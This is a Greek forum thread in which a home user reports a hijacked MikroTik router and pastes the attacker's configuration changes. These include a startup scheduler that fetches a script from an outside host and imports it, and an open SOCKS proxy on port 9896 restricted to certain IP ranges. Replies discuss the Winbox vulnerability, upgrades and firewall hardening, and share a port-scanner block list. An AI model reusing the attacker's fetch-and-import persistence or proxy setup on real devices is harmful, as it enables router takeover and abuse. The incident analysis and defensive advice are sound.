Επίθεση σε Mikrotik router

[gvast]

Καλησπέρα σας,
Καταρχάς συγχαρήτηρια στην ομάδα, ωραία δουλειά.

Τώρα... long story short... Επιστρέφω σήμερα από τη δουλειά μετά τις 4 το μεσημέρι, κάνω τη ρουτίνα μου και το απόγευμα λέω να συνδεθώ στο ΜΤ για να συνεχίσω το μικρό οικιακό μου project.Η πρώτη προσπάθεια μέσω Winbox και χρήση IP απέτυχε. Προσπαθώ μέσω browser, μπαίνω κανονικά. Περίεργο... σκέφτομαι. Προσπαθώ ξανά μέσω Winbox αλλά χρήση MAC και μπαίνω.
Στο Winbox έχω μόνιμα το log ανοιχτό. Βλέπω τα αποτυχημένα μου logins αλλά..., πιο πάνω βλέπω log entries για αλλαγές στο firewall, script που έτρεχε συνέχεια και άλλα τέτοια περίεργα. Όλα αυτά είχαν timestamp πριν τις 4 (όταν δλδ εγώ ήμουν στη δουλειά) που σημαίνει ότι κάποιος άλλος έκανε login ως admin και άλλαξε το configuration.

Ευτυχώς είχα πρόσφατο backup. Έσωσα το "μολυσμένο" configuration στο σκληρό δίσκο και επανέφερα το ΜΤ πάλι σε ορθή λειτουργία. Τέλος καλό όλα καλά θέλω να πιστεύω.

Παραθέτω παρακάτω τις αλλαγές που έκανε ο επιτιθέμενος στο configuration μπας και καταλάβουμε τι ήθελε να πετύχει, αλλά και να μάθω αν το όλο θέμα οφείλεται σε δικές μου παραλείψεις σε θέματα ασφάλειας ή σε αδυναμία του Winbox.

Κώδικας:

/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot

/ip firewall filter
add action=accept chain=input dst-port=9896 protocol=tcp
add action=reject chain=output dst-address=139.99.5.202 protocol=tcp
add action=reject chain=output dst-address=95.154.216.166 protocol=tcp
add action=accept chain=input dst-port=9896 protocol=tcp

/system scheduler
add disabled=yes interval=2d name=U6 on-event="/tool fetch url=http://my1story\
    .xyz/poll/ce685827-b618-42bf-960e-6abcdbd750de mode=http dst-path=7wmp0b4s\
    wouv\r\
    \n/import 7wmp0b4swouv" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup

Επίσης μου έχει προσθέσει έναν DNS server με IP 1.1.1.1

Να προσθέσω ότι είχα εύκολο password (τέτοιο που σπάει με λεξικό) για τον admin user το οποίο το έχω ήδη αλλάξει.

Αυτά από εμένα... τα φώτα σας τώρα... τι λέτε να έκανε στο router μου ο επιτιθέμενος βάση αυτών που σας έχω πει μέχρι στιγμής;

[euri]

Υπήρξε την άνοιξη ένα κενό ασφαλείας στο Winbox:
https://blog.mikrotik.com/security/w...erability.html
https://forum.mikrotik.com/viewtopic.php?t=133533

Και τώρα είδα αυτό:
https://blog.mikrotik.com/security/n...erability.html
(δεν είναι νέο κενό ασφαλείας, απλά διαφορετικός τρόπος επίθεσης για το παραπάνω κενό)

[gvast]

Ευχαριστώ euri.
Έκανα το ugrade μου, έχω άλλαξει και τα passwords και από εδώ και πέρα θα δώσω μεγαλύτερη προσοχή στο κομμάτι ασφάλεια.
Δεν έχω μεγάλη εμπειρία αλλά κάτι θα καταφέρω στο τέλος.

- - - Updated - - -

Για κάποιο λόγο ξέσχασα να δώσω και κάποιες άλλες αλλαγές που μου έκανε στο configuration. Παραθέτω παρακάτω:

Κώδικας:

/ip service
set telnet disabled=yes
set ssh port=26711
set api disabled=yes
set winbox disabled=yes
set api-ssl disabled=yes

/ip socks
set enabled=yes port=9896

/ip socks access
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0

Επίσης παρατήρησα σήμερα ότι αργά το βράδυ (γύρω στις 3 το βράδυ) μια προσπάθεια προσβασης στο vpn που στήνω. Αλλά είδα εδώ ότι είναι μια τακτική η οποία είναι γενικά ακίνδυνη.

[griniaris]

Εγω εχω τις τελευταιες μερες πολλες επιθεσεις απο Ρωσσια.

Γινεται αυτοματα μπλοκαρισμα της ΙΡ στις 5 αποτυχημενες προσταθειες σε χρονο 5 λεπτων.

Προσπαθω να βρω λυση με GEO LOCK . ακομα βεβαια ειμαι στο διαβασμα για να μαζεψω πληροφοριες.
Αλλα εχω κολλησει στο να βρω ολο το μπλοκ ΙΡ της Ελλαδος . Αν ηταν συνεχομενο θα ειχα ξεμπερδεψει.
Αλλα βλεπω υπαρχουν πολλα διασπαρτα.

Θα ηταν τελειο να καταφερω να περιορισω την προσβαση μονο σε Ελληνικες ΙΡ.

[seatakias]

Γινεται αυτοματα μπλοκαρισμα της ΙΡ στις 5 αποτυχημενες προσταθειες σε χρονο 5 λεπτων

Πως γίνεται να κάνουμε μπλοκαρισμα IP μετά από αποτυχημενες προσπάθειες;

[griniaris]

Πως γίνεται να κάνουμε μπλοκαρισμα IP μετά από αποτυχημενες προσπάθειες;

Υπαρχουν πολλοι τροποι. Δεν ξερω ποιος ειναι ο καλυτερος. Οποιον βολευει καποιον.

Υπαρχουν οδηγοι παντου. Κανε ενα search. Στα προχειρα... κοιτα εδω και εδω .

Αφου καταλαβεις τι παιζει το τροποποιεις οπως σε βολευει.

[Nikiforos]

καλημέρα, @gvast δες και εδώ στο θεμα μας https://www.adslgr.com/forum/threads...-IPv6-firewall
εχουμε βαλει πολλους σχετικους κανονες.
Και πρεπει να εχεις και τελευταια ROS που εχουν κλεισει τα κενα ασφαλειας δλδ την stable, υποθετω ειχες παλια εκδοση.
Και παλι όμως θες κανονες fw rules για προστασια και αν μπορεις μην βγαζεις στο ιντερνετ υπηρεσίες του όπως πχ το winbox!
προσωπικα δεν βγαζω τπτ ότι θελω τα κανω μεσω openvpn και μονο.
Ότι βολευει τον καθενα είναι πολύ ποιο ασφαλες αντι να βγαζεις κάθε υπηρεσια του στο ιντερνετ, δλδ winbox, ftp, webfig, ssh, telnet κτλ.
Σε δικα μου με ιντερνετ εχω δει port scanners αλλα μπλοκάρονται συνεχεια και δεν εχει γινει κατι παραπανω. Exω και κανονες σχετικους με scan, brute force και για επιθεσεις σε κάθε μορφης υπηρεσια παρολο ότι δεν τις βγαζω απεξω.
ΠΑΝΤΑ βαζω την τελευταια STABLE ROS και εννοείτε δεν υπαρχει user admin.

Eνα 951 με κινητη που εχω, μολις μου το εκαναν να εχει public ip την ωρα που το εστηνα εβλεπα στα logs της ποπης από επιθεσεις!
όλα καλα μετα, μεχρι που μου την πεσανε μεσω DNS!!! και μου εφαγαν όλα τα δεδομενα μεσα σε ένα ΣΚ.
Μετα εβαλα κανονα και για το DNS και μετα κανενα πρόβλημα από τοτε.

Δες εδώ κανονες προστασιας https://www.marthur.com/networking/m...rotection/382/
και εδώ https://wiki.mikrotik.com/wiki/Manua...ng_Your_Router

[seatakias]

Υπαρχουν πολλοι τροποι. Δεν ξερω ποιος ειναι ο καλυτερος. Οποιον βολευει καποιον.

Υπαρχουν οδηγοι παντου. Κανε ενα search. Στα προχειρα... κοιτα εδω και εδω .

Αφου καταλαβεις τι παιζει το τροποποιεις οπως σε βολευει.

Ευχαριστώ θα το κοιτάξω.

[macro]

Ή απλα μπορεις να βαλεις μονο εναν κανονα για τοπικο login στο winbox του στυλ......

Κώδικας:

add chain=input action=drop connection-state=new src-address-list=!Trusted winbox logins

Οπου src. add. list θα βαλεις το δικτυο σου (π.χ. 192.168.1.0/24), βαλε και ενα timeout=24h και φτιαξε πρωτα το κανονα του address-list, για να μη κλειδωθεις απ' εξω μολις τον περασεις.

Με αυτο το κανονα δε χρειαζεσαι τπτ αλλο, ουτε brute force ουτε port scanners............. τιποτα.


Αν και νομιζω οτι αν εχεις κανονα allow lan input-forward καθως και drop everything else input-forward παλι δε μπορει να μπει κανενας.

[galotzas]

Αυτο που εγραψε ο nikiforos https://wiki.mikrotik.com/wiki/Manua...ng_Your_Router ειναι το καλυτερο μιας και ειναι το επισημο για τις τελευταιες επιθεσεις. Το εχω ακολουθησει βημα βημα και δεν εχω παρατηρησει το παραμικρο.

[macro]

Εγω τα εχω κοψει ολα..... ssh telnet, τα παντα.

[Nikiforos]

καλησπέρα, για port scanners καλο ειναι να εχουμε κανονα ωστε και οι ips καταγραφονται και τρωνε και block.
Κακο ΔΕΝ κανει!
και εγω τα εχω κοψει ολα και μπαινω ΜΟΝΟ μεσω OPENVPN και απο πουθενα αλλου, με καποιες εξαιρεσεις για το AWMΝ που δεν ειναι επι του παρον τοπικ και forum να αναλυσω.
Οσο περισσοτερη ασφαλεια εχουμε τοσο ποιο δυσκολο ειναι για καποιο να εισχωρησει στο μηχανημα μας.

[Follow_Security]

οριστε και μερικες διευθυνσεις portscanning...
τον περασμενο μηνα χτυπησα ρεκορ... 5.972 μπλοκαρισμενες διεθυνσεις...

Κώδικας:

Flags: X - disabled, D - dynamic  #   LIST                                          ADDRESS                                                            CREATION-TIME        TIMEOUT             
 0 D port scanners                                 40.112.90.122                                                      oct/28/2018 19:17:42 1w54m57s            
 1 D port scanners                                 13.94.136.165                                                      oct/30/2018 21:36:02 1w2d3h13m17s        
 2 D port scanners                                 137.116.234.82                                                     nov/01/2018 16:44:56 1w5d12h48m10s       
 3 D port scanners                                 80.107.188.48                                                      nov/01/2018 21:47:28 1w4d3h34m31s        
 4 D port scanners                                 79.166.56.185                                                      nov/01/2018 22:13:19 1w4d9h37m42s        
 5 D port scanners                                 84.254.11.132                                                      nov/01/2018 22:29:08 1w4d9h17m23s        
 6 D port scanners                                 85.74.146.90                                                       nov/01/2018 23:18:26 1w4d5h27m44s        
 7 D port scanners                                 178.59.156.190                                                     nov/02/2018 00:20:15 1w4d5h57m31s

[galotzas]

Portscan απο microsoft cyta otenet και vodafone? Καμια ρωσια περιμενα και κινα..... Ειναι σιγουρα portscan αυτα?

[Follow_Security]

ναι ... 100% ειναι P.S. Εχω ειδικα Rules για να καταγραφω την αιτουμενη πορτα και την IP που την ζητησε... ειναι ολες εξωτερικου βεβαια, καμια δεν ειναι απο ελλαδα...